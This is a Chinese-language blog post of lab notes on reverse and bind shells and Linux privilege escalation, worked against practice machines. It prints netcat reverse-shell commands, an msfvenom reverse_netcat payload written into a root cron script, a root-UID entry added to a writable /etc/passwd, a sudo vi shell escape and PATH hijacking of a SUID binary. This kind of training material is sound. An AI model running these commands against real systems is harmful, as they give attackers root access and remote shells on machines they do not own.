<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>Shell与Linux常见权限提升技术 | X1NRI</title>
  <meta name="author" content="X1NRI">
  
  <meta name="description" content="更新">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="Shell与Linux常见权限提升技术"/>
  <meta property="og:site_name" content="X1NRI"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="X1NRI" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">X1NRI</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/links" title="Subscribe me.">
			  <i class="fa fa-chain"></i>Links
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> Shell与Linux常见权限提升技术</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> 更新
		 </div> <!-- alert -->
	  		

	  <p><img src="/PenTest_FILE/f359dc9b359137fc0a67464fef1365fd_MD5.jpeg"></p>
<h1 id="一、shell是什么"><a href="#一、shell是什么" class="headerlink" title="一、shell是什么"></a>一、shell是什么</h1><h2 id="Shell的类型"><a href="#Shell的类型" class="headerlink" title="Shell的类型"></a>Shell的类型</h2><blockquote>
<p>在高层次上，当涉及到利用目标时，我们对两种 shell 感兴趣：反向 shell 和绑定 shell。</p>
</blockquote>
<ul>
<li>Reverse shells<br>反向 shell 是指强制目标执行连接回计算机的代码，在攻击机上设置接受连接的侦听器。<br>反向 shell 是绕过防火墙规则的好方法，因为这些规则可能会阻止您连接到目标上的任意端口。但缺点是，当通过 Internet 从计算机接收 shell 时，您需要配置自己的网络以接受 shell。</li>
</ul>
<p>以下是一个linux的反向shell例子：</p>
<p>攻击机<code>sudo nc -lvnp 443</code>监听端口，靶机<code>nc &lt;LOCAL-IP&gt; &lt;PORT&gt; -e /bin/bash</code>连接我们的ip和监听端口<br><img src="/PenTest_FILE/8986b480d2916588fe9ae5361abb94bc_MD5.jpeg"></p>
<ul>
<li>Bind shells<br>绑定 shell 是指使用在目标上执行的代码来启动直接在目标上附加到 shell 的侦听器。<br>这将向互联网开放，这意味着您可以连接到代码已打开的端口，并以这种方式获得远程代码执行。这样做的优点是不需要在您自己的网络上进行任何配置，但缺点是可以通过保护目标的防火墙来阻止。</li>
</ul>
<p>以下是一个windows的绑定shell例子：<br>靶机<code>nc -lvnp &lt;port&gt; -e &quot;cmd.exe&quot;</code>在本地开放端口，攻击机<code>nc MACHINE_IP &lt;port&gt;</code>去连接靶机的该端口<br><img src="/PenTest_FILE/d0ca8083ce4908d80fad645da9518acb_MD5.jpeg"></p>
<hr>
<p>还有一个概念是交互性，Shell 可以是交互式的，也可以是非交互式的。</p>
<h2 id="一-Netcat-shell"><a href="#一-Netcat-shell" class="headerlink" title="(一) Netcat shell"></a>(一) Netcat shell</h2><h3 id="Netcat-shell"><a href="#Netcat-shell" class="headerlink" title="Netcat shell"></a>Netcat shell</h3><ul>
<li>Reverse shell<br>使用 Linux 启动 netcat 侦听器的语法如下：<br><code>nc -lvnp &lt;port-number&gt;</code></li>
</ul>
<blockquote>
<p>-l：用于告诉 netcat 这将是一个侦听器<br>-v：详细信息<br>-n：告诉 netcat 不要解析主机名或使用 DNS<br>-p：表示将遵循端口规范</p>
</blockquote>
<p>上一个任务中的示例使用了端口 443。实际上，您可以使用任何您喜欢的端口，只要还没有服务使用它。请注意，如果选择使用低于 1024 的端口，则需要在启动侦听器时使用 <code>sudo</code> 。也就是说，使用已知的端口号（80、443 或 53 是不错的选择）通常是一个好主意，因为这更有可能绕过目标上的出站防火墙规则。</p>
<ul>
<li>Bind shell<br>如果我们希望在目标上获得绑定 shell，那么我们可以假设在目标的选定端口上已经有一个侦听器在等着我们：我们需要做的就是连接到它。其语法相对简单：<br><code>nc &lt;target-ip&gt; &lt;chosen-port&gt;</code></li>
</ul>
<h3 id="稳定shell"><a href="#稳定shell" class="headerlink" title="稳定shell"></a>稳定shell</h3><blockquote>
<p>默认情况下，这些 shell 非常不稳定。按 Ctrl + C 会杀死整个事情。它们是非交互式的，并且经常有奇怪的格式错误。这是因为 netcat 的“shell”实际上是在终端内运行的进程，而不是真正的终端。幸运的是，有很多方法可以稳定 Linux 系统上的 netcat shell。</p>
</blockquote>
<h4 id="Ⅰ-python"><a href="#Ⅰ-python" class="headerlink" title="Ⅰ. python"></a>Ⅰ. python</h4><p>这种技术仅仅适用于linux机器，因为它们总是默认安装了python</p>
<ol>
<li><p><code>python -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39;</code><br>它使用 Python 生成外观更好的 bash shell。请注意，某些目标可能需要指定的 Python 版本。如果是这种情况，请根据需要替换为 <code>python</code> <code>python2</code> 或 <code>python3</code> 。</p>
</li>
<li><p><code>export TERM=xterm</code><br>这将使我们能够访问术语命令，例如 <code>clear</code> .</p>
</li>
<li><p><code>stty raw -echo; fg</code><br>最后（也是最重要的）我们将使用 Ctrl + Z 对 shell 进行后台处理。回到我们自己的终端中，我们执行<code>stty raw -echo; fg</code> 。这做了两件事：它关闭了我们自己的终端回显（它使我们能够访问 Tab 自动完成、箭头键和 Ctrl + C 来终止进程），并将拿到的shell放在我们自己的终端。</p>
</li>
</ol>
<blockquote>
<p>请注意，如果 shell 死亡，您自己的终端中的任何输入都将不可见（由于禁用了终端回显）。解决方法是键入 <code>reset</code> 并按 Enter。</p>
</blockquote>
<h4 id="Ⅱ-rlwarp"><a href="#Ⅱ-rlwarp" class="headerlink" title="Ⅱ. rlwarp"></a>Ⅱ. rlwarp</h4><blockquote>
<p>RLWrap 是一个程序，简单来说，它使我们能够在收到 shell 后立即访问历史记录、Tab 自动完成和箭头键。默认情况下，Kali 上未安装 rlwrap，因此首先使用 <code>sudo apt install rlwrap</code></p>
</blockquote>
<p><code>rlwrap nc -lvnp &lt;port&gt;</code></p>
<blockquote>
<p>在 netcat 监听器前面加上 “rlwrap” 为我们提供了一个功能更全面的 shell。这种技术在处理 Windows shell 时特别有用。<br>而在处理 Linux 目标时，可以使用与上一种技术的第三步相同的技巧来完全稳定：使用 Ctrl + Z 使 shell 背景，然后用于 <code>stty raw -echo; fg</code> 稳定并重新进入 shell。</p>
</blockquote>
<h4 id="Ⅲ-socat"><a href="#Ⅲ-socat" class="headerlink" title="Ⅲ. socat"></a>Ⅲ. socat</h4><blockquote>
<p>稳定 shell 的第三种简单方法是使用初始 netcat shell 作为进入功能更全面的 socat shell 的垫脚石。请记住，此技术仅限于 Linux 目标，<strong>因为 Windows 上的 Socat shell 不会比 netcat shell 更稳定</strong></p>
</blockquote>
<h2 id="二-Socket-shell"><a href="#二-Socket-shell" class="headerlink" title="(二) Socket shell"></a>(二) Socket shell</h2><h3 id="Socket-shell"><a href="#Socket-shell" class="headerlink" title="Socket shell"></a>Socket shell</h3><h3 id="加密shell"><a href="#加密shell" class="headerlink" title="加密shell"></a>加密shell</h3><h2 id="三-Msfvenom"><a href="#三-Msfvenom" class="headerlink" title="(三) Msfvenom"></a>(三) Msfvenom</h2><blockquote>
<p>Msfvenom，是与所有payload相关的一站式商店。作为 Metasploit 框架的一部分，msfvenom 主要用于生成反向和绑定 shell 的代码。它广泛用于较低级别的漏洞利用开发中，以在开发类似缓冲区溢出漏洞时生成十六进制 shellcode；但是，它也可用于生成各种格式（例如 <code>.exe</code> ， <code>.aspx</code>， <code>.war</code>， <code>.py</code> ）的有效载荷</p>
</blockquote>
<h2 id="四-Webshells"><a href="#四-Webshells" class="headerlink" title="(四)Webshells"></a>(四)Webshells</h2><h2 id="Linux练习箱"><a href="#Linux练习箱" class="headerlink" title="Linux练习箱"></a>Linux练习箱</h2><h2 id="Windows练习箱"><a href="#Windows练习箱" class="headerlink" title="Windows练习箱"></a>Windows练习箱</h2><h1 id="二、常见Linux权限提升技术"><a href="#二、常见Linux权限提升技术" class="headerlink" title="二、常见Linux权限提升技术"></a>二、常见Linux权限提升技术</h1><p><img src="/PenTest_FILE/0a70592ff63c044809ad9164425e3aed_MD5.jpeg"></p>
<ul>
<li>水平权限提升：这是通过接管与您处于相同权限级别的其他用户来扩大对受感染系统的影响范围的地方。例如，一个普通用户劫持另一个普通用户（而不是提升为超级用户）。这允许您继承该用户拥有的任何文件和访问权限。例如，这可用于访问另一个普通特权用户，该用户恰好将 SUID 文件附加到其主目录（稍后会详细介绍），然后可以使用该文件来获取超级用户访问权限。</li>
<li>垂直权限提升：这是您尝试使用已泄露的现有帐户获得更高权限或访问权限的地方。对于本地权限升级攻击，这可能意味着劫持具有管理员权限或 root 权限的帐户。</li>
</ul>
<h2 id="一-枚举"><a href="#一-枚举" class="headerlink" title="(一) 枚举"></a>(一) 枚举</h2><blockquote>
<p>我们需要用到一个bash脚本：<code>LinEnum</code>，<a href="%5Bhttps://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh%5D(https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh)">地址</a>。LinEnum 是一个简单的 bash 脚本，它执行与权限提升相关的常见命令。</p>
</blockquote>
<h3 id="如何在目标计算机获得LinEnum"><a href="#如何在目标计算机获得LinEnum" class="headerlink" title="如何在目标计算机获得LinEnum"></a>如何在目标计算机获得LinEnum</h3><ol>
<li><p>第一种方法：是在本机转到存储 LinEnum 本地副本的目录，并使用<code>python3 -m http.server 8000</code> [1] 启动 Python Web 服务器。然后，在目标机器上使用<code>wget</code>连接本地 IP:8000，您可以从本地机器 [2] 获取文件。然后使用命令<code>chmod +x FILENAME.sh</code>使文件可执行。</p>
</li>
<li><p>第二种方法：如果您无法传输文件，您还可以从本地计算机 [1] 直接复制原始 LinEnum 代码，并使用 Vi 或 Nano [2] 将其粘贴到目标上的新文件中。</p>
</li>
</ol>
<h3 id="LinEnum的使用"><a href="#LinEnum的使用" class="headerlink" title="LinEnum的使用"></a>LinEnum的使用</h3><p>我们关注输出的这几项内容：</p>
<ul>
<li><em>Kernel</em>：此处显示内核信息。这台机器很可能存在可用的内核漏洞。</li>
<li><em>Can we read&#x2F;write sensitive files</em>：这些是任何经过身份验证的用户都可以读取和写入的文件。通过查看这些敏感文件的权限，我们可以看到哪里存在配置错误，允许通常不应该写入敏感文件的用户。</li>
<li><em>SUID Files</em>：此处显示了 SUID 文件的输出。有一些有趣的项目，我们肯定会将其作为提升特权的一种方式。SUID（在执行时设置所有者用户 ID）是授予文件的一种特殊类型的文件权限。它允许文件以所有者的权限运行。如果这是 root，则它以 root 权限运行。它可以让我们提升权限。</li>
<li><em>Crontab Contents</em>：crontab是一个系统中定期执行任务的工具</li>
</ul>
<h3 id="练习"><a href="#练习" class="headerlink" title="练习"></a>练习</h3><p>先用ssh连接主机，以user3的身份登录</p>
<p>使用python web服务器，传输LinEnum.sh<br><img src="/PenTest_FILE/d48205e48d07ead847c2b110654b759b_MD5.jpeg"></p>
<ol>
<li>目标的主机名是什么？答：polobox<br>直接hostname命令即可</li>
<li>查看 &#x2F;etc&#x2F;passwd 的输出，系统上有多少个“user[x]”？答：8<br><img src="/PenTest_FILE/e8048726010b63d973dd291a0190e26c_MD5.jpeg"></li>
<li>系统上有多少个可用的shell？答：4<br>查看&#x2F;etc&#x2F;shells<br><img src="/PenTest_FILE/654a118fe4a67e3e7c36a4868e41694f_MD5.jpeg"></li>
<li>cron 设置为每 5 分钟运行一次的 bash 脚本的名称是什么？答：autoscript.sh<br>查看&#x2F;etc&#x2F;crontab<br><img src="/PenTest_FILE/ae55b638765cf9226940c7aaf1d1156f_MD5.jpeg"></li>
<li>哪个关键文件的权限已更改以允许某些用户写入它？答：&#x2F;etc&#x2F;passwd<br><img src="/PenTest_FILE/f8cd54fbb40f976465fffea80fd1616e_MD5.jpeg"></li>
</ol>
<p>s## (二) 利用suid&#x2F;guid文件</p>
<h3 id="什么是suid二进制文件"><a href="#什么是suid二进制文件" class="headerlink" title="什么是suid二进制文件"></a>什么是suid二进制文件</h3><p>众所周知，在 Linux 中，一切都是一个文件，包括有权允许或限制三个操作的目录和设备，即读&#x2F;写&#x2F;执行。因此，当您为任何文件设置权限时，您应该了解您允许或限制所有三个权限的 Linux 用户。请看以下最大权限 （rwx-rwx-rwx） 的演示：</p>
<p>r &#x3D; read r &#x3D; 读取<br>w &#x3D; write w &#x3D; 写入<br>x &#x3D; execute x &#x3D; 执行  </p>
<table>
<thead>
<tr>
<th>user</th>
<th>group</th>
<th>others</th>
</tr>
</thead>
<tbody><tr>
<td>rwx</td>
<td>rwx</td>
<td>rwx</td>
</tr>
<tr>
<td>421</td>
<td>421</td>
<td>421</td>
</tr>
</tbody></table>
<p>但是，当向每个用户授予特殊权限时，它就变成了 SUID或 SGID。</p>
<ul>
<li>SUID(rws-rwx-rwx)： 0表示去除suid权限，4表示添加suid权限，而且是在原权限的数字表达形式开头加0或4，如：0755移除suid权限，4755添加suid权限。</li>
<li>GUID(rwx-rws-rwx)：0表示去除sgid权限，2表示添加sgid权限，而且是在原权限的数字表达形式开头加0或2，如：0755移除sgid权限，2755添加sgid权限。</li>
</ul>
<h3 id="寻找suid文件"><a href="#寻找suid文件" class="headerlink" title="寻找suid文件"></a>寻找suid文件</h3><p>LinEnum能够自动扫描SUID文件，不过如果要手动操作，我们可以使用命令：<br><code>find / -perm -u=s -type f 2&gt;/dev/null</code></p>
<ul>
<li>find - 启动“find”命令</li>
<li>&#x2F; - 搜索整个文件系统</li>
<li>-perm - 搜索具有特定权限的文件</li>
<li>-u&#x3D;s - 为文件设置了任何权限位模式。这种形式接受符号模式</li>
<li>-type f - 仅搜索文件</li>
<li>2&gt;&#x2F;dev&#x2F;null - 禁止显示错误</li>
</ul>
<h3 id="利用suid文件"><a href="#利用suid文件" class="headerlink" title="利用suid文件"></a>利用suid文件</h3><blockquote>
<p>参考文章：<a target="_blank" rel="noopener" href="https://gtfobins.github.io/">GTFOBins — 走开垃圾箱</a></p>
</blockquote>
<h2 id="三-利用可写的-etc-passwd"><a href="#三-利用可写的-etc-passwd" class="headerlink" title="(三) 利用可写的 &#x2F;etc&#x2F;passwd"></a>(三) 利用可写的 &#x2F;etc&#x2F;passwd</h2><h3 id="何为-etc-passwd"><a href="#何为-etc-passwd" class="headerlink" title="何为&#x2F;etc&#x2F;passwd"></a>何为&#x2F;etc&#x2F;passwd</h3><blockquote>
<p>&#x2F;etc&#x2F;passwd 文件存储登录时所需的基本信息。换句话说，它存储用户帐户信息。&#x2F;etc&#x2F;passwd 是一个纯文本文件。它包含系统帐户列表，为每个帐户提供一些有用的信息，如用户 ID、组 ID、主目录、shell 等。</p>
</blockquote>
<p>&#x2F;etc&#x2F;passwd 文件应具有常规读取权限，因为许多命令实用程序使用它来将用户标识映射到用户名。但是，对 &#x2F;etc&#x2F;passwd 的写入访问权限<strong>必须仅限制超级用户&#x2F;root 帐户</strong>。如果没有，或者用户被错误地添加到允许写入的组中，那么我们就可能允许创建一个我们可以访问的root用户。</p>
<h3 id="etc-passwd的格式"><a href="#etc-passwd的格式" class="headerlink" title="&#x2F;etc&#x2F;passwd的格式"></a>&#x2F;etc&#x2F;passwd的格式</h3><p>&#x2F;etc&#x2F;passwd 文件每行包含一个条目，用于系统的每个用户（用户帐户）。所有字段都用冒号“:”分隔。总共有七个字段，如下所示。通常，&#x2F;etc&#x2F;passwd 文件条目如下所示：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">test:x:0:0:root:/root:/bin/bash<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ol>
<li>Username：用户名，用户登录时使用</li>
<li>Password：密码，x 字符表示加密的密码存储在 &#x2F;etc&#x2F;shadow 文件中。请注意，您需要使用 passwd 命令来计算在 CLI 中键入的密码的哈希值，或者在 &#x2F;etc&#x2F;shadow 文件中存储&#x2F;更新密码的哈希值，在这种情况下，密码哈希值存储为“x”。</li>
<li>User ID(UID)：用户ID，必须为每个用户分配一个用户 ID （UID）。UID 0（零）保留给 root，UID 1-99 保留给其他预定义帐户。此外，UID 100-999 由系统为管理和系统帐户&#x2F;组保留。</li>
<li>Group ID(GID)：组ID，存储在 &#x2F;etc&#x2F;group 文件中</li>
<li>User ID info：用户ID信息，它允许您添加有关用户的额外信息，例如用户的全名、电话号码等。</li>
<li>Home directory：主目录，用户登录时所在目录的绝对路径。如果此目录不存在，则 users 目录变为 &#x2F;</li>
<li>Command&#x2F;shell：命令或 shell 的绝对路径 （&#x2F;bin&#x2F;bash）。通常，这是一个 shell</li>
</ol>
<h3 id="练习-1"><a href="#练习-1" class="headerlink" title="练习"></a>练习</h3><p>继续枚举用户，我们发现 user7 是 gid 为 0 的根组的成员。我们已经从 LinEnum 扫描中知道 &#x2F;etc&#x2F;passwd 文件对用户来说是可写的。因此，根据这一观察，我们得出结论，user7 可以编辑 &#x2F;etc&#x2F;passwd 文件。(现在假设我们已知user7用户的密码为password)<br><img src="/PenTest_FILE/29954f8582e4ee14fcca9fb04b4a25c5_MD5.jpeg"></p>
<p>其实很简单，如果我们有一个可写的 &#x2F;etc&#x2F;passwd 文件，我们可以根据上面的公式写一个新行条目，创建一个新用户！我们添加我们选择的密码哈希，并将 UID、GID 和 shell 设置为 root。允许我们以自己的root用户身份登录！</p>
<p><code>openssl passwd -1 -salt [salt] [password]</code>，该命令可以得到用户hash</p>
<p>比如我们先创建一个用户new，密码为123：<br><img src="/PenTest_FILE/67960ae526f35153c6894833c9d679e9_MD5.jpeg"><br>那么可以推测该用户的&#x2F;etc&#x2F;passwd条目是：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">new:<span class="token variable">$1</span><span class="token variable">$new</span><span class="token variable">$p7ptkEKU1HnaHpRtzNizS1</span>:0:0:root:/root:/bin/bash<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>接下来su切换为user7，将它添加至&#x2F;etc&#x2F;passwd的末尾即可<br><img src="/PenTest_FILE/57ed34af3a2da6053065f8e8ce8f17b4_MD5.jpeg"></p>
<h2 id="四-利用vi编辑器"><a href="#四-利用vi编辑器" class="headerlink" title="(四) 利用vi编辑器"></a>(四) 利用vi编辑器</h2><h3 id="sudo-l命令"><a href="#sudo-l命令" class="headerlink" title="sudo -l命令"></a>sudo -l命令</h3><p>每次访问某个帐户时，都应使用<code>sudo -l</code>来列出作为该帐户可以使用的root用户命令。您会发现您可以在没有 root 密码的情况下以 root 用户身份运行某些命令。这可以帮助提升权限。</p>
<h3 id="练习-2"><a href="#练习-2" class="headerlink" title="练习"></a>练习</h3><blockquote>
<p>背景：登录用户user8:password</p>
</blockquote>
<p>先看看有哪些root命令可供使用<br><img src="/PenTest_FILE/ea7dc6d0d4f798aeeb53fc1a93d1f1d4_MD5.jpeg"><br>直接<code>sudo vi</code>，输入<code>: !sh</code><br><img src="/PenTest_FILE/006ffe6378b58ad085da0f91d55eaa79_MD5.jpeg"><br><img src="/PenTest_FILE/619894bdd61c728a3c621cc1a8fe2905_MD5.jpeg"></p>
<h2 id="五-利用crontab"><a href="#五-利用crontab" class="headerlink" title="(五) 利用crontab"></a>(五) 利用crontab</h2><h3 id="何为Cron进程"><a href="#何为Cron进程" class="headerlink" title="何为Cron进程"></a>何为Cron进程</h3><p>Cron 守护进程是一个长时间运行的进程，它在特定日期和时间执行命令。您可以使用它来计划活动，既可以作为一次性事件，也可以作为重复性任务。您可以创建一个 crontab 文件，其中包含供 Cron 守护程序执行的命令和指令。</p>
<p>我们可以使用命令 <code>“cat /etc/crontab”</code> 来查看调度了哪些 cron 作业。每当有机会时，您都应该始终手动检查这一点，尤其是在 LinEnum 或类似脚本找不到任何内容的情况下。</p>
<h3 id="Cronjob的格式"><a href="#Cronjob的格式" class="headerlink" title="Cronjob的格式"></a>Cronjob的格式</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token comment"># Example of job definition:                                                                 │</span>
<span class="token comment"># .---------------- minute (0 - 59)                                                          │</span>
<span class="token comment"># |  .------------- hour (0 - 23)                                                            │</span>
<span class="token comment"># |  |  .---------- day of month (1 - 31)                                                    │</span>
<span class="token comment"># |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...                                    │</span>
<span class="token comment"># |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat       │</span>
<span class="token comment"># |  |  |  |  |                                                                              │</span>
<span class="token comment"># *  *  *  *  * user-name command to be executed    </span>
<span class="token number">17</span> *    * * *   root    <span class="token builtin class-name">cd</span> / <span class="token operator">&amp;&amp;</span> run-parts <span class="token parameter variable">--report</span> /etc/cron.hourly  <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<h3 id="练习-3"><a href="#练习-3" class="headerlink" title="练习"></a>练习</h3><p>我们从 LinEnum 扫描中得知，user4 桌面上的文件 autoscript.sh 计划每五分钟运行一次。它归 root 所有，这意味着它将以 root 权限运行，尽管我们可以写入此文件。然后，任务是创建一个命令，该命令将返回一个 shell 并将其粘贴到此文件中。当文件在五分钟后再次运行时，shell 将以 root 身份运行。</p>
<p><img src="/PenTest_FILE/9ee0f823d61b02fba0bf64c69e4bcff7_MD5.jpeg"><br><img src="/PenTest_FILE/9751d7e7e26ed9e384794a4271832589_MD5.jpeg"></p>
<p>我们使用 msfvenom 为我们的 cron 漏洞创建一个反弹shell的payload，命令 <code>msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R</code><br><img src="/PenTest_FILE/ca4bea5480bb2b56990b43e04b11655e_MD5.jpeg"></p>
<p>将payload写入 autoscript.sh文件，接着在本地进行监听，约5分钟后成功反弹shell！<br><img src="/PenTest_FILE/ceda654dc6d8b3f9d2bcc5ab9e639554_MD5.jpeg"></p>
<h2 id="六-利用PATH变量"><a href="#六-利用PATH变量" class="headerlink" title="(六) 利用PATH变量"></a>(六) 利用PATH变量</h2><h3 id="什么是-PATH"><a href="#什么是-PATH" class="headerlink" title="什么是$PATH"></a>什么是$PATH</h3><p>PATH 是 Linux 和类 Unix 操作系统中的环境变量，它指定保存可执行程序的目录。<strong>当用户在终端中运行任何命令时，它会借助 PATH 变量搜索可执行文件，以响应用户执行的命令。</strong></p>
<p>借助命令<code>“echo $PATH”</code>查看相关用户的路径非常简单。<br><img src="/PenTest_FILE/cabb436cde1b15b6f8fcfae5a9e8a8de_MD5.jpeg"></p>
<h3 id="如何利用-PATH"><a href="#如何利用-PATH" class="headerlink" title="如何利用$PATH"></a>如何利用$PATH</h3><p>假设我们有一个 SUID 二进制文件。运行它，我们可以看到它正在调用系统 shell 来执行一个基本功能，例如使用“ps”列出进程。与我们之前的 SUID 示例不同，在这种情况下，我们无法通过提供注入参数来利用它，那么我们可以做些什么来尝试利用它呢？</p>
<p>我们可以将 PATH 变量重写到我们选择的位置！当 SUID 二进制文件调用系统 shell 来运行可执行文件时，它会运行我们编写的可执行文件。</p>
<h3 id="练习-4"><a href="#练习-4" class="headerlink" title="练习"></a>练习</h3><p>目录下有个名为“script”的文件，运行下看看：<br><img src="/PenTest_FILE/6a7a003dbc3339fa894ee9f1efc326c2_MD5.jpeg"><br>具有suid权限，实现了目录 ls 功能</p>
<p>我们先将目录改为&#x2F;tmp，创建一个伪造可执行文件，格式是<code>echo “[无论我们想运行什么命令]” &gt; [我们正在模仿的可执行文件的名称]</code><br><img src="/PenTest_FILE/da75c583e5ecf424d5f04c1addf2cc1f_MD5.jpeg"></p>
<p>接着更改路径变量，使其指向存储着伪造“ls”的目录，命令是<code>export PATH=/tmp:$PATH</code>，在$PATH前面加上&#x2F;tmp目录。<br>请注意，这将导致您每次使用“ls”时都打开 bash 提示符。如果你在完成漏洞利用之前需要使用“ls”，请使用<code>“/bin/ls”</code>，是真正的“ls”可执行文件所在。<br><img src="/PenTest_FILE/b9eb04149b140969d0cced3a60645eb7_MD5.jpeg"></p>
<p>成功得到root权限！<br><img src="/PenTest_FILE/cfb51fd1b4cad70c9d34ab1ee7657159_MD5.jpeg"></p>
<blockquote>
<p>一旦你完成了这个漏洞利用，你可以退出root，并使用<code>export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH</code>，将PATH变量重置为默认值，让你能够正常使用“ls”</p>
</blockquote>
<h2 id="扩展"><a href="#扩展" class="headerlink" title="扩展"></a>扩展</h2><p>在 Linux 权限提升这个巨大的领域中，从来没有一个“神奇”的答案。这只是尝试提升权限时需要注意的基本事项的几个示例，要想做得更好，唯一的方法就是练习和积累经验。清单是确保您在枚举阶段没有遗漏任何内容的好方法，并且还可以为您提供一个资源，以便在您忘记确切使用哪些命令时检查如何执行操作。</p>
<p>以下是适用于 CTF 或渗透测试用例的良好清单列表。虽然我鼓励你使用CherryTree或任何你喜欢的笔记应用程序来制作自己的笔记。</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md">https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md</a></li>
<li><a target="_blank" rel="noopener" href="https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html">https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html</a></li>
<li><a target="_blank" rel="noopener" href="https://payatu.com/guide-linux-privilege-escalation">https://payatu.com/guide-linux-privilege-escalation</a></li>
</ul>
<p><strong>Thank you</strong><br>感谢您抽出宝贵时间在这个房间里工作，祝您未来好运。</p>
<h1 id="三、Linux提权练习"><a href="#三、Linux提权练习" class="headerlink" title="三、Linux提权练习"></a>三、Linux提权练习</h1>
	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	<span id="/2024/01/15/Shell%E4%B8%8ELinux%E5%B8%B8%E8%A7%81%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%8A%80%E6%9C%AF/" class="leancloud-visitors view" data-flag-title="Shell与Linux常见权限提升技术">
		<em class="post-meta-item-text"> Page View </em> <i class="leancloud-visitors-count"></i>
	</span>
	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2024/01/27/LK01 Holstein v1 栈溢出/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2023/12/31/Basic Pentesting/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
		<section id="comments" class="comments">
			<style>
			.comments{margin:30px;padding:10px;background:rgb(0, 0, 0)}
			@media screen and (max-width:800px){.comments{margin:auto;padding:10px;background:#000}}
			</style>
			<div id="vcomment" class="comment"></div>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script src="https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
